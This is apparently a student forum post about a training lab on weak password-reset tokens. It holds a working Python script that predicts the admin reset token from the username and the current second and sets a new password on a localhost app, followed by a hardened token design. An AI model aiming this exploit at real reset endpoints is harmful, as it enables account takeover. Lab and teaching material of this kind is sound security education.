
Lack of Resources for Lab 4.1 - Insecure Randomness in Web Applications

Hello everyone,

I've been working on Lab 4.1, which involves exploiting weak randomization in a password reset function. However, the provided resources are insufficient for completing the lab effectively.

  • No guidance on interacting with the web application endpoints to exploit the vulnerability.
  • The provided solution uses a static datetime, not reflecting the dynamic nature of the actual application.

To help others, here’s a script that completes the lab, with added print statements for clarity:

import requests
import hashlib
import datetime
import time
import sys

base_url = 'http://localhost:5000'

# Step 1: Trigger the forget password functionality
forget_password_url = f'{base_url}/passwordForget'
admin_username = 'admin'
print(f"[INFO] Initiating password reset for user '{admin_username}'...")
response = requests.post(forget_password_url, data={'username': admin_username})

if response.status_code == 200:
    print("[INFO] Password reset request sent successfully.")
else:
    print("[ERROR] Failed to send password reset request.")
    sys.exit(1)

# Step 2: Wait a second to ensure the timestamp is accurate
time.sleep(1)

# Calculate the reset token: the lab derives it from the username and the
# current second-of-minute only, so it is reproducible from the client side.
current_time = datetime.datetime.now()
timestamp = current_time.second
to_hash = admin_username + str(timestamp)
reset_token = hashlib.sha1(to_hash.encode('utf-8')).hexdigest()

print(f"[INFO] Calculated reset token: {reset_token}")

# Step 3: Use the reset token to reset the admin's password
reset_password_url = f'{base_url}/reset'
new_password = 'password1'
print(f"[INFO] Sending password reset request with token '{reset_token}' and new password '{new_password}'...")
response = requests.post(reset_password_url, data={
    'resetToken': reset_token,
    'username': admin_username,
    'password': new_password
})

if response.status_code == 200:
    print(f"[SUCCESS] Password for user '{admin_username}' has been reset to '{new_password}'.")
else:
    print(f"[ERROR] Failed to reset the password. Server responded with status code {response.status_code}.")

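As an added example (not part of the lab or the post above), the snippet below models the lab's weak token derivation (username + second-of-minute, SHA-1) to show how small its token space is, and places a hardened generator beside it: a CSPRNG token via `secrets`, stored only as a hash, bound to the user, expiring, single-use, and checked with a constant-time comparison. The store, TTL and function names are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Set, Tuple

# Weak generator modelled on the lab's reset logic as described in the post
# (not the lab's own code): the only varying input is the current second
# (0-59), so a given username has at most 60 possible tokens.
def weak_reset_token(username: str, second: int) -> str:
    return hashlib.sha1((username + str(second)).encode("utf-8")).hexdigest()

def weak_token_space(username: str) -> Set[str]:
    """Every token the weak generator can ever produce for this user."""
    return {weak_reset_token(username, s) for s in range(60)}

# Hardened replacement (assumed design): unguessable token, hashed at rest,
# bound to the username, time-limited, single-use, constant-time verified.
TOKEN_TTL_SECONDS = 15 * 60
_pending: Dict[str, Tuple[str, float]] = {}   # username -> (sha256(token), expiry)

def issue_reset_token(username: str, now: Optional[float] = None) -> str:
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)            # 256 bits from the OS CSPRNG
    digest = hashlib.sha256(token.encode("utf-8")).hexdigest()
    _pending[username] = (digest, now + TOKEN_TTL_SECONDS)
    return token                                 # deliver out of band (e-mail), never log it

def verify_reset_token(username: str, token: str, now: Optional[float] = None) -> bool:
    now = time.time() if now is None else now
    entry = _pending.get(username)
    if entry is None:
        return False
    digest, expiry = entry
    if now > expiry:                             # expired: discard and refuse
        _pending.pop(username, None)
        return False
    presented = hashlib.sha256(token.encode("utf-8")).hexdigest()
    if not hmac.compare_digest(presented, digest):
        return False                             # wrong token, no timing leak
    _pending.pop(username, None)                 # accepted tokens are single-use
    return True
```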